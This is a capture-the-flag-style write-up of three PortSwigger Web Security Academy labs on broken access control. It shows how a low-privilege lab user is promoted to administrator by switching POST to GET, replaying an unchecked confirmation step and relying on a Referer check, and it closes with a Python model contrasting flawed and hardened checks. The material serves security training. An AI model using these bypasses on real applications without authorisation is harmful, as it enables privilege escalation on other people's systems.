Burp Web Academy: Access Control Vulnerabilities (Part 3)

0x01. PortSwigger Web Security Academy

PortSwigger Web Security Academy is the free web security training range released by the makers of Burp Suite. While learning web security, you can also practise hands-on Burp Suite skills.

This article walks through the Access Control Vulnerabilities chapter of the Web Security Academy.

0x02. Access Control Vulnerabilities

2.1 Lab: Method-based access control can be circumvented

This lab implements access controls based partly on the HTTP method of requests. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.

To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.

First log in as administrator. There is a user management page where a user's level can be adjusted (upgraded to administrator or downgraded to a normal user). Capture the request first.

Then log in as wiener and try to upgrade your own account (remember to set the Cookie to wiener's session value):

POST /admin-roles HTTP/2
Host: 0a0100490482d648802485f7005300ae.web-security-academy.net
Cookie: session=VEpavD1XF1FS0n9gElQY2aEkJeFgiIAW
Content-Length: 30
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://0a0100490482d648802485f7005300ae.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a0100490482d648802485f7005300ae.web-security-academy.net/admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

username=wiener&action=upgrade

The response is Unauthorized:

HTTP/2 401 Unauthorized
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 14

"Unauthorized"

Following the lab's hint, change it to a GET request, and the account is promoted to administrator:

GET /admin-roles?username=wiener&action=upgrade HTTP/2

So the endpoint accepts both GET and POST, but the authorization check is only applied to POST.

2.2 Lab: Multi-step process with no access control on one step

This lab has an admin panel with a flawed multi-step process for changing a user’s role. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.

To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.

First log in as administrator. There is a user management page where a user's level can be adjusted (upgraded to administrator or downgraded to a normal user), but this time with a second confirmation step. Capture the requests and compare them.

Step one, upgrade the user:

POST /admin-roles HTTP/2
Host: 0a4c003f04db44998092c738003000e6.web-security-academy.net
......

username=wiener&action=upgrade

A page asks whether to confirm the upgrade; you can go back or confirm. Confirming also triggers a POST request:

POST /admin-roles HTTP/2
Host: 0a4c003f04db44998092c738003000e6.web-security-academy.net
......

action=upgrade&confirmed=true&username=wiener

Same URL, just one extra parameter, confirmed=true. Log in directly as wiener, replace the Cookie, send the request above, and the account is promoted to administrator.

2.3 Lab: Referer-based access control

This lab controls access to certain admin functionality based on the Referer header. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.

To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.

Not too hard: capture administrator's request, log in as wiener, replace the Cookie, send that request, and the account is promoted to administrator.

Of course, as the lab description says, access is controlled via the Referer header. This is a simple and classic problem; for example, some sites block image hotlinking by checking the Referer.

If the Referer is removed, the response is Unauthorized:

HTTP/2 401 Unauthorized
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 14

"Unauthorized"

0x03. Summary

  • Try different request methods (GET, POST, etc.) to see whether the authorization check can be bypassed
  • Compare the HTTP requests behind different operations and look for differences in the parameters
  • Referer-based authorization can be bypassed
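As an added example (not PortSwigger's lab code), the following Python model of the /admin-roles endpoint reproduces the three defects in one flawed policy (check only on POST, skipped on the confirmed=true step, skipped when the Referer points at /admin) beside a hardened policy that decides solely on the session's role and never changes state on GET. The session tokens, role table and the attempt() helper are constructed for the example.

```python
# Added example, not from PortSwigger or the lab: a model of /admin-roles with the
# three flawed checks beside a role-only check. SESSIONS and roles are constructed.
from dataclasses import dataclass, field

SESSIONS = {"admin-token": "administrator", "wiener-token": "wiener"}


def fresh_roles():
    return {"administrator": "admin", "wiener": "user", "carlos": "user"}


@dataclass
class Request:
    method: str
    params: dict                                  # query string or form body, merged
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)


def session_role(req, roles):
    """Role of the user behind the session cookie, or None if the cookie is unknown."""
    return roles.get(SESSIONS.get(req.cookies.get("session")))


def flawed_is_authorized(req, roles):
    """Lab behaviour: the admin check runs only for POST, is skipped on the
    confirmed=true step, and is skipped when the Referer claims to come from /admin."""
    from_admin_page = req.headers.get("Referer", "").endswith("/admin")
    check_needed = (req.method == "POST"
                    and req.params.get("confirmed") != "true"
                    and not from_admin_page)
    return (not check_needed) or session_role(req, roles) == "admin"


def hardened_is_authorized(req, roles):
    """Decide only on the authenticated session's role; state changes require POST."""
    return req.method == "POST" and session_role(req, roles) == "admin"


def admin_roles(req, roles, is_authorized):
    """Handle /admin-roles: returns an HTTP status and applies the change on 200.
    The lab's confirmation page is folded into the policy rather than modelled."""
    if not is_authorized(req, roles):
        return 401
    target, action = req.params.get("username"), req.params.get("action")
    if target not in roles or action not in ("upgrade", "downgrade"):
        return 400
    roles[target] = "admin" if action == "upgrade" else "user"
    return 200


def attempt(policy, method, params, headers=None, session="wiener-token"):
    """Send one request under the given session; returns (status, wiener's role after)."""
    roles = fresh_roles()
    req = Request(method, params, headers or {}, {"session": session})
    return admin_roles(req, roles, policy), roles["wiener"]
```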

0x04. References

  1. https://portswigger.net/web-security/all-labs#access-control-vulnerabilities